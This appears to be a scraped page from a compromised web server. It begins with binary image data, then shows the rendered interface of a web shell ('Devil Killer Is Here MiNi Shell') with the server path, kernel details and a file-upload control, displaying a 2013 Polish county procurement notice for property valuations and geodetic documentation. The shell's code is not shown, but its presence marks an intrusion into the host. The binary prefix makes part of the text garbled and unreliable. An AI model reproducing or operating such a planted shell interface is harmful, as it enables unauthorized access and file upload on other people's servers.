JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130925/195725-N-2013.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.23.2013 Zamówienie na sporządzenie dokumentacji  związanej z  gospodarowaniem nieruchomościami Skarbu Państwa i Powiatu Nowosądeckiego (operaty szacunkowe, dokumentacja geodezyjna)</b><br>
<b>Numer ogłoszenia: 195725 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.nowy-sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.23.2013 Zamówienie na sporządzenie dokumentacji  związanej z  gospodarowaniem nieruchomościami Skarbu Państwa i Powiatu Nowosądeckiego (operaty szacunkowe, dokumentacja geodezyjna).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi sporządzenia dokumentacji związanej z gospodarowaniem nieruchomościami Skarbu Państwa i Powiatu Nowosądeckiego (operaty szacunkowe, dokumentacja geodezyjna):
- sporządzenie operatów szacunkowych;
- analiza stanu prawnego nieruchomości;
- okresowa weryfikacja operatu ewidencji gruntów; 
- sporządzenie kopii mapy ewidencyjnej;
- uzupełnienie wykazu nieruchomości. 

Cena za wykonanie usługi obejmuje również udział w postępowaniu administracyjnym i sądowym w sprawach dotyczących wykonanego opracowania, w tym w rozprawach przed urzędami oraz sądami powszechnymi. 

Postępowanie zostało podzielone na dziesięć wyszczególnionych poniżej części. Wykonawca może złożyć ofertę na wszystkie części lub dowolnie przez siebie wybrane.

Część	
Zakres prac

1.	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości stanowiącej własność Powiatu Nowosądeckiego położonej  w Starym Sączu przy ul. Mickiewicza 33, oznaczonej jako działka ewidencyjna Nr 2285 o powierzchni 0,5241 ha, objęta księgą wieczystą Nr NS1S/00014280/0, zabudowana budynkiem szkoły, wolnostojącym, murowanym, parterowym, o powierzchni użytkowej 380 m2, oraz budynkiem pomocniczym, murowanym, wolnostojącym, parterowym, o powierzchni użytkowej  45,80 m2.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy. 
2.	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 269/26 o  pow. 0,97 ha, położona w Nawojowej, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym - dla potrzeb ustalenia opłaty z tytułu przekształcenia prawa użytkowania wieczystego w prawo własności.
Termin wykonania: 15 listopad 2013 r.  
3.	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 685 o  pow.0,08 ha, położona w Żegiestowie gm. Muszyna, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Termin wykonania: 15 listopad 2013 r. 
4.	Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działki ewid. nr 772 i 773 o  łącznej pow.0,5987 ha, położone w obr. Krynica-Wieś m. Krynica-Zdrój, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Termin wykonania: 15 listopad 2013 r. . 
5.	Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Kw NS1G/00022506/9 - Stróże gm. Grybów, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych ze skompletowaniem dokumentacji będącej podstawą zmiany oznaczenia w księdze wieczystej dla w/w nieruchomości, oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych objętych pozycją rejestrową nr 13 operatu ewidencji gruntów dla obr. Stróże gm. Grybów wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach
Księga obejmuje 7 parcel (działek) o łącznej powierzchni 3,6055 ha
W rejestrze uwidocznionych jest 7 działek ewidencyjnych o łącznej powierzchni 0,7020 ha
Termin wykonania: 15 listopad 2013 r. 
6.	Okresowa weryfikacja operatu ewidencji gruntów polegająca na zmianie oznaczenia dla działki ewidencyjnej 2325/9 o pow. 0,03 ha położonej w obrębie Biała Niżna  gm. Grybów.
Opracowanie należy sporządzić  w 3 egzemplarzach.
Termin wykonania: 15 listopad 2013 r. 
7. 	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej nr 151/1 o pow. 2,11 ha położonej w obrębie Rożnów gm. Gródek nad Dunajcem, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Termin wykonania: 15 listopad 2013 r. 
8.	Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Lwh 247- gm. kat. Czarny Potok, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Księga obejmuje 15 parcel (działek).
Opracowanie należy sporządzić  w 3 egzemplarzach.
Termin wykonania: 15 listopad 2013 r. 
9.	Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej Skarbu Państwa nr 373/13 o pow. 5,20 ha położonej w obrębie ewidencyjnym Popardowa gm. Nawojowa - w części oznaczonej na załączniku graficznym obejmującej teren położony poza korytem cieku wodnego -  wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości - dla potrzeb regulacji stanu prawnego nieruchomości
Opracowanie należy sporządzić  w 3 egzemplarzach .
Termin wykonania:15 listopad 2013 r. 
10.	Uzupełnienie wykazu nieruchomości Skarbu Państwa dla celów realizacji ustawy z dnia 07 września 2007 r. o ujawnieniu w księgach wieczystych prawa własności nieruchomości Skarbu Państwa oraz jednostek samorządu terytorialnego dla 42 działek ewidencyjnych położonych  w obrębie Biała Niżna gmina Grybów o dane wieczysto - księgowe dla w/w działek zgodnie z tabelą prowadzoną przez Wydział Geodezji i Budownictwa. W przypadku rozbieżności w oznaczeniu działek pomiędzy stanem w ewidencji gruntów  w Lwh/KW należy wykonać  kopię mapy ewidencyjnej z wykazem zmian gruntowych.
Opracowanie należy sporządzić  w 3 egzemplarzach oraz w wersji cyfrowej.
Termin wykonania: 15 listopad 2013 r.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga w szczególności aby: zamówienie na realizację części 1, 2, 3 i 4 wykonywane było przez osoby posiadające uprawnienia zawodowe w zakresie szacowania nieruchomości, zamówienie na realizację części 5, 6, 7, 8, 9 i 10 wykonywane było przez osoby posiadające uprawnienia zawodowe w dziedzinie geodezji i kartografii. Wykonawca potwierdza spełnianie warunku poprzez złożenie: - oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji), - oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (wzór oświadczenia stanowi załącznik nr 5 do specyfikacji)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Wyjątek stanowi sytuacja gdy konieczne będzie przedłużenie terminu realizacji zamówienia z powodów niezawinionych przez Wykonawcę np. oczekiwania na wydanie niezbędnych uzgodnień, postanowień lub decyzji innych organów (urzędów miast, urzędów gmin, sądów powszechnych). Forma aneks do umowy. Warunek: zmiana będzie korzystna dla Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna, pok. 113, ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości stanowiącej własność Powiatu Nowosądeckiego położonej  w Starym Sączu przy ul. Mickiewicza 33, oznaczonej jako działka ewidencyjna Nr 2285 o powierzchni 0,5241 ha, objęta księgą wieczystą Nr NS1S/00014280/0, zabudowana budynkiem szkoły, wolnostojącym, murowanym, parterowym, o powierzchni użytkowej 380 m2, oraz budynkiem pomocniczym, murowanym, wolnostojącym, parterowym, o powierzchni użytkowej  45,80 m2.
Termin wykonania: 1 miesiąc od dnia zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 269/26 o  pow. 0,97 ha, położona w Nawojowej, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym - dla potrzeb ustalenia opłaty z tytułu przekształcenia prawa użytkowania wieczystego w prawo własności.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działka ewid. nr 685 o  pow.0,08 ha, położona w Żegiestowie gm. Muszyna, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej, oznaczonej jako działki ewid. nr 772 i 773 o  łącznej pow.0,5987 ha, położone w obr. Krynica-Wieś m. Krynica-Zdrój, stanowiąca własność Skarbu Państwa w użytkowaniu wieczystym  - dla potrzeb aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Kw NS1G/00022506/9 - Stróże gm. Grybów, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych ze skompletowaniem dokumentacji będącej podstawą zmiany oznaczenia w księdze wieczystej dla w/w nieruchomości, oraz sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działek ewidencyjnych objętych pozycją rejestrową nr 13 operatu ewidencji gruntów dla obr. Stróże gm. Grybów wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Opracowanie należy sporządzić  w 3 egzemplarzach
Księga obejmuje 7 parcel (działek) o łącznej powierzchni 3,6055 ha
W rejestrze uwidocznionych jest 7 działek ewidencyjnych o łącznej powierzchni 0,7020 ha
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okresowa weryfikacja operatu ewidencji gruntów polegająca na zmianie oznaczenia dla działki ewidencyjnej 2325/9 o pow. 0,03 ha położonej w obrębie Biała Niżna  gm. Grybów.
Opracowanie należy sporządzić  w 3 egzemplarzach.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie kopii mapy ewidencyjnej z wykazem zmian gruntowych dla działki ewidencyjnej nr 151/1 o pow. 2,11 ha położonej w obrębie Rożnów gm. Gródek nad Dunajcem, wraz ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> CZĘŚĆ 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza stanu prawnego nieruchomości Skarbu Państwa obj. Lwh 247- gm. kat. Czarny Potok, z wykonaniem wykazu zmian gruntowych oraz kopii map ewidencyjnych połączonych ze skompletowaniem dokumentacji będącej podstawą założenia księgi wieczystej dla w/w nieruchomości.
Księga obejmuje 15 parcel (działek).
Opracowanie należy sporządzić  w 3 egzemplarzach.
Termin wykonania: 15 listopad 2013 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1, 70.10.00.00-2, 71.35.40.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
